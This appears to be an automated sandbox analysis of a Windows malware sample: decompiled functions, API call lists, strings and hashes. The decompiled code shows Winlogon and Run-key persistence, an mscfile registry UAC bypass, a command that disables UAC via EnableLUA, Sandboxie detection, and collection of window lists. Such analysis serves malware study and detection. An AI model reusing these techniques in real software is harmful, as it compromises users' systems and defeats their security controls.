                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t12, _t12, "onlinelogs", 0x415268, _t15);
                                          					_t15 = _t25 + 0x14;
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          				}
                                          				_t11 = WaitForSingleObject( *(_t25 + 0x30), 0xffffffff);
                                          				goto L1;
                                          			}












                                          0x004042b6
                                          0x004042bb
                                          0x004042bf
                                          0x004042c5
                                          0x004042c8
                                          0x004042d0
                                          0x004042d2
                                          0x004042dc
                                          0x004042de
                                          0x004042e1
                                          0x004042f2
                                          0x004042f5
                                          0x00404302
                                          0x00404307
                                          0x0040430f
                                          0x00404317
                                          0x0040431d
                                          0x00404323
                                          0x00404323
                                          0x0040432e
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 004042BF
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668,?,?,?,00000000,00000000,00000000,00000000), ref: 004042D2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,onlinelogs,00415268,?), ref: 004042F5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404302
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00404317
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,?), ref: 00404323
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,00000000,00000000,00000000), ref: 0040432E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@0@V?$basic_string@$D@2@@std@@Hstd@@$??1?$basic_string@??4?$basic_string@??9std@@CreateEventObjectSingleV01@V10@0@V10@@Wait
                                          • String ID: onlinelogs
                                          • API String ID: 3814545256-2085248552
                                          • Opcode ID: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                                          • Instruction ID: dcc0d7a04b3077ee23eca2ee736643480c7622a3ab28667727a229d9fd835d7f
                                          • Opcode Fuzzy Hash: f8ba56530e54795d1a185f62b9b80f38ef3ca3acce3b7b9791dac6e42c8a8b2b
                                          • Instruction Fuzzy Hash: 0601D2B1500208BFC750AB74DE49DEB7BBCFF85304B10067AF902A2691DAB89D488779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415968,00000000,00415940), ref: 00402B87
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402B90
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,00000000), ref: 00402BAB
                                            • Part of subcall function 00408F64: RegOpenKeyExA.ADVAPI32(80000001,00406AD4,00000000,00020019,00406AD4), ref: 00408F7E
                                            • Part of subcall function 00408F64: RegQueryValueExA.ADVAPI32(00406AD4,?,00000000,00000000,?,80000001,80000001), ref: 00408F9A
                                            • Part of subcall function 00408F64: RegCloseKey.ADVAPI32(00406AD4), ref: 00408FA5
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00402BD6
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc), ref: 00402BF5
                                            • Part of subcall function 00409132: RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00406E1F,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 00409143
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$CloseOpenValue$??0?$basic_string@??1?$basic_string@?length@?$basic_string@?size@?$basic_string@CreateD@1@@Query
                                          • String ID: Software\Classes\mscfile\shell\open\command$origmsc
                                          • API String ID: 1049763294-2313358711
                                          • Opcode ID: b8e30dd9eff11f67c3cf9612cc96ea1f73efbc8e0254643fb7297258ac34518d
                                          • Instruction ID: ce9100f12018cb41e6333c8ca2a80e1a56526989df9abf25ad7ef470a405d909
                                          • Opcode Fuzzy Hash: b8e30dd9eff11f67c3cf9612cc96ea1f73efbc8e0254643fb7297258ac34518d
                                          • Instruction Fuzzy Hash: 5511CA71A002547BDB0163A89C99BEF776D9B85300F0441B7F945E22C1DAB85E8647DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E00401000(void* __eflags) {
                                          				intOrPtr* _t1;
                                          				intOrPtr* _t2;
                                          				intOrPtr* _t3;
                                          				intOrPtr* _t4;
                                          				intOrPtr* _t5;
                                          				intOrPtr* _t6;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t14;
                                          				void* _t16;
                                          				void* _t18;
                                          				intOrPtr* _t22;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t26;
                                          
                                          				_t1 = E00401289(0x415940, __eflags, 0x1c);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t18 = 1;
                                          				if( *_t1 == _t18) {
                                          					_t16 = E004010F1();
                                          					_t39 = _t16;
                                          					if(_t16 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t2 = E00401289(0x415940, _t39, 0x1d);
                                          				_t22 = _t2;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t2 == _t18) {
                                          					_t14 = E00401102(_t22);
                                          					_t41 = _t14;
                                          					if(_t14 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t3 = E00401289(0x415940, _t41, 0x1f);
                                          				_t24 = _t3;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t3 == _t18) {
                                          					_t12 = E00401178(_t24);
                                          					_t43 = _t12;
                                          					if(_t12 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t4 = E00401289(0x415940, _t43, 0x20);
                                          				_t26 = _t4;
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t4 == _t18) {
                                          					_t10 = E004011A3(_t26);
                                          					_t45 = _t10;
                                          					if(_t10 != 0) {
                                          						E00401234(_t18);
                                          					}
                                          				}
                                          				_t5 = E00401289(0x415940, _t45, 0x21);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t46 =  *_t5 - _t18;
                                          				if( *_t5 == _t18) {
                                          					CreateThread(0, 0, E004011F8, 0, 0, 0);
                                          				}
                                          				_t6 = E00401289(0x415940, _t46, 0x22);
                                          				__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				if( *_t6 == _t18) {
                                          					CreateThread(0, 0, E00401216, 0, 0, 0);
                                          				}
                                          				return 0;
                                          			}

















                                          0x0040100c
                                          0x00401013
                                          0x0040101b
                                          0x0040101e
                                          0x00401020
                                          0x00401025
                                          0x00401027
                                          0x0040102a
                                          0x0040102f
                                          0x00401027
                                          0x00401034
                                          0x00401039
                                          0x0040103b
                                          0x00401043
                                          0x00401045
                                          0x0040104a
                                          0x0040104c
                                          0x0040104f
                                          0x00401054
                                          0x0040104c
                                          0x00401059
                                          0x0040105e
                                          0x00401060
                                          0x00401068
                                          0x0040106a
                                          0x0040106f
                                          0x00401071
                                          0x00401074
                                          0x00401079
                                          0x00401071
                                          0x0040107e
                                          0x00401083
                                          0x00401085
                                          0x0040108d
                                          0x0040108f
                                          0x00401094
                                          0x00401096
                                          0x00401099
                                          0x0040109e
                                          0x00401096
                                          0x004010a3
                                          0x004010aa
                                          0x004010b2
                                          0x004010b4
                                          0x004010c0
                                          0x004010c0
                                          0x004010ca
                                          0x004010d1
                                          0x004010d9
                                          0x004010e5
                                          0x004010e5
                                          0x004010f0

                                          APIs
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                          • CreateThread.KERNEL32 ref: 004010C0
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                          • CreateThread.KERNEL32 ref: 004010E5
                                            • Part of subcall function 004010F1: GetModuleHandleA.KERNEL32(SbieDll.dll,00401025,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010F6
                                            • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,00410560,00415978,00415940), ref: 00401259
                                            • Part of subcall function 00401234: exit.MSVCRT ref: 00401263
                                            • Part of subcall function 00401234: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000002F,0041055C,00000001,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401278
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$?data@?$basic_string@D@2@@std@@$??8std@@CreateD@2@@0@ThreadV?$basic_string@$HandleModuleexit
                                          • String ID:
                                          • API String ID: 3827955099-0
                                          • Opcode ID: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                                          • Instruction ID: 5b21bb54b2fce72050f5962a4a3546230b449f07c752eed21346b36d0e69d07d
                                          • Opcode Fuzzy Hash: 886a64f9d97f4e7677d0af7a9acbcbccb3fe7bc9225a759a474fba55b627c5cf
                                          • Instruction Fuzzy Hash: EF21F12064128066EA2537B26D1EAAF1A1A4BC6705B0400FFF582BF2E2DE7D4CC1D66D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E0040F8BF() {
                                          				struct tagMSG _v32;
                                          				char _v292;
                                          				int _t15;
                                          
                                          				GetModuleFileNameA(0,  &_v292, 0x104);
                                          				 *0x415bb4 = E0040F978();
                                          				0x415bb0->cbSize = 0x58;
                                          				 *0x415bb8 = 1;
                                          				 *0x415bc0 = 0x401;
                                          				 *0x415bc4 = ExtractIconA(0,  &_v292, 0);
                                          				lstrcpynA(0x415bc8,  *0x415120, 0x40);
                                          				 *0x415bbc = 7;
                                          				Shell_NotifyIconA(0, 0x415bb0);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v32);
                                          				while(1) {
                                          					_t15 = GetMessageA();
                                          					if(_t15 == 0) {
                                          						break;
                                          					}
                                          					TranslateMessage( &_v32);
                                          					DispatchMessageA( &_v32);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push( &_v32);
                                          				}
                                          				return _t15;
                                          			}






                                          0x0040f8d9
                                          0x0040f8e4
                                          0x0040f8f2
                                          0x0040f8fc
                                          0x0040f906
                                          0x0040f918
                                          0x0040f928
                                          0x0040f934
                                          0x0040f93e
                                          0x0040f94a
                                          0x0040f94b
                                          0x0040f94f
                                          0x0040f950
                                          0x0040f951
                                          0x0040f951
                                          0x0040f955
                                          0x00000000
                                          0x00000000
                                          0x0040f95b
                                          0x0040f965
                                          0x0040f96b
                                          0x0040f96c
                                          0x0040f970
                                          0x0040f971
                                          0x0040f971
                                          0x0040f977

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F8D9
                                            • Part of subcall function 0040F978: RegisterClassExA.USER32(00000030), ref: 0040F9BE
                                            • Part of subcall function 0040F978: CreateWindowExA.USER32 ref: 0040F9D9
                                            • Part of subcall function 0040F978: GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0040F910
                                          • lstrcpynA.KERNEL32(00415BC8,00000040), ref: 0040F928
                                          • Shell_NotifyIconA.SHELL32(00000000,00415BB0), ref: 0040F93E
                                          • GetMessageA.USER32 ref: 0040F951
                                          • TranslateMessage.USER32(?), ref: 0040F95B
                                          • DispatchMessageA.USER32 ref: 0040F965
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID:
                                          • API String ID: 1970332568-0
                                          • Opcode ID: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                                          • Instruction ID: 6c70321501f622e291cef7a2b269b544ec8077eec463a2dcd1f5d48526f3bc04
                                          • Opcode Fuzzy Hash: 2786fddfdab5fbc73eaeb84a67dd41f479d7273ef5a77b00e14b6c4e5329e6b6
                                          • Instruction Fuzzy Hash: BF111FB2806619EBD7109B91EC48EEB3B7CFB89354F008176B615E2190D7B8A545CBAC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E004084B8() {
                                          				struct _PROCESS_INFORMATION _v20;
                                          				struct _STARTUPINFOA _v88;
                                          				signed int _t17;
                                          
                                          				_t17 = 0x11;
                                          				memset( &_v88, 0, _t17 << 2);
                                          				_v88.cb = 0x44;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                          				CloseHandle(_v20);
                                          				return CloseHandle(_v20.hThread);
                                          			}






                                          0x004084c4
                                          0x004084c8
                                          0x004084cd
                                          0x004084d4
                                          0x004084d5
                                          0x004084d6
                                          0x004084d7
                                          0x004084f6
                                          0x00408505
                                          0x0040850f

                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00415968,00000000), ref: 004084F6
                                          • CloseHandle.KERNEL32(?), ref: 00408505
                                          • CloseHandle.KERNEL32(?), ref: 0040850A
                                          Strings
                                          • D, xrefs: 004084CD
                                          • C:\Windows\System32\cmd.exe, xrefs: 004084F1
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004084EC
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                          • API String ID: 2922976086-1747066916
                                          • Opcode ID: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                                          • Instruction ID: 49ef00a26c30989ba7ed88d2a65af69d250c14a9bd2b913ba13855b573ed4d5e
                                          • Opcode Fuzzy Hash: a99085f489ab2e170cca9d3e23119def7522f92bfbabe080ea7c5488701c172d
                                          • Instruction Fuzzy Hash: F0F0D0B69005187EEB409BE5DC05EFFBB7DE748710F104421FB01F6160D6B469498A65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00415268,00000000,73115DF0), ref: 0040DE7B
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DE88
                                          • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000), ref: 0040DE98
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040DEA1
                                          • atoi.MSVCRT ref: 0040DEA8
                                            • Part of subcall function 0040DA55: GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,758EFF80,00415268,7313CB00), ref: 0040DA80
                                            • Part of subcall function 0040DA55: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,758EFF80,00415268,7313CB00), ref: 0040DA94
                                            • Part of subcall function 0040DA55: GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                                            • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(758EFF80,00415268,7313CB00), ref: 0040DAB3
                                            • Part of subcall function 0040DA55: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                                            • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                                            • Part of subcall function 0040DA55: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                                            • Part of subcall function 0040DA55: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEB9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DEC2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??1?$basic_string@?size@?$basic_string@V12@$??0?$basic_string@?find@?$basic_string@?length@?$basic_string@?substr@?$basic_string@AddressD@1@@GdiplusLibraryLoadProcStartupatoi
                                          • String ID:
                                          • API String ID: 4181878723-0
                                          • Opcode ID: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                                          • Instruction ID: a53c021e27954d43d5d070e7438e4a07455e2c0535f708b4c7a5eec2c33dd71b
                                          • Opcode Fuzzy Hash: 44cda1b0aba01f95a7190a095bd5c6faa0b09c69638a034032fd8e8976cd13aa
                                          • Instruction Fuzzy Hash: CFF01272500119EBCB04AFA4EC4D9DE7778FB44315B108575F917970A0DFB49984CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000), ref: 0040ED82
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED8C
                                          • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?,00000000), ref: 0040ED95
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040ED9F
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?,00000000,?), ref: 0040EDA9
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2), ref: 0040EDBF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040C2C2,?), ref: 0040EDC8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                          • String ID:
                                          • API String ID: 2478582372-0
                                          • Opcode ID: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                                          • Instruction ID: 1564fe7f85c29674afeedc34bac84888193373dfe958ee75c0cfd53d5d2b696a
                                          • Opcode Fuzzy Hash: adb46ca283450cb9f2384b23b62c3c9c57bbe05b8ad4d32cfd432fa645a760be
                                          • Instruction Fuzzy Hash: 71F0AF7550010EABCB04EFA0D95D9EE7778FF44305F008465F91697190DBB49E49CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0040C9DD() {
                                          				char _v20;
                                          				char* _t4;
                                          				void* _t5;
                                          				void* _t10;
                                          
                                          				EnumWindows(E0040C8F3, 0);
                                          				_t4 =  &_v20;
                                          				L0040FC1A();
                                          				L0040FC14();
                                          				_t5 = E00402198(0x415a30, _t10 - 0x10);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t4, _t4, "windowslist", 0x415268, 0x415a20);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x410668);
                                          				return _t5;
                                          			}







                                          0x0040c9eb
                                          0x0040c9f4
                                          0x0040ca09
                                          0x0040ca13
                                          0x0040ca20
                                          0x0040ca28
                                          0x0040ca38
                                          0x0040ca40

                                          APIs
                                          • EnumWindows.USER32(0040C8F3,00000000), ref: 0040C9EB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,windowslist,00415268,00415A20), ref: 0040CA09
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00415A20), ref: 0040CA13
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415A20), ref: 0040CA28
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668,?,?,?,?,?,00415A20), ref: 0040CA38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@??4?$basic_string@EnumV01@V01@@V10@0@V10@@Windows
                                          • String ID: windowslist
                                          • API String ID: 1943122135-3779825983
                                          • Opcode ID: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                                          • Instruction ID: fd0eb6cd70df32150fd7f84368215a10c343f41110055329f562a51080181c44
                                          • Opcode Fuzzy Hash: b547f61fa1d04b115500ff6018a40232aa2c76acc4097e1a31bcc498f6059ffc
                                          • Instruction Fuzzy Hash: A0E0E571AC0218ABD20073A46D4BFEE3B18FA91705F404672FA02711D1EAFC18D882AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 43%
                                          			E0040EE4B(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                          				char _v20;
                                          				void* _t15;
                                          				void* _t18;
                                          				signed int _t20;
                                          				void* _t22;
                                          				void* _t26;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				signed int _t37;
                                          				void* _t47;
                                          				signed int _t58;
                                          				void* _t59;
                                          
                                          				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          				_t58 = __eax + 2;
                                          				_t15 = _t58 + _t58;
                                          				L0040FCCC();
                                          				_t26 = _t15;
                                          				_t29 = _t58;
                                          				_t47 = _t26;
                                          				_t30 = _t29 >> 2;
                                          				_t18 = memset(_t47 + _t30, memset(_t47, 0, _t30 << 2), (_t29 & 0x00000003) << 0);
                                          				_t6 = _t58 - 2; // 0x0
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                          				_t59 = _t18;
                                          				_t37 = _t6 >> 2;
                                          				_t20 = memcpy(_t26, _t59, _t37 << 2);
                                          				_t22 = memcpy(_t59 + _t37 + _t37, _t59, _t20 & 0x00000003);
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t26,  &_a11);
                                          				E0040FC2C(_t22, _t26);
                                          				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
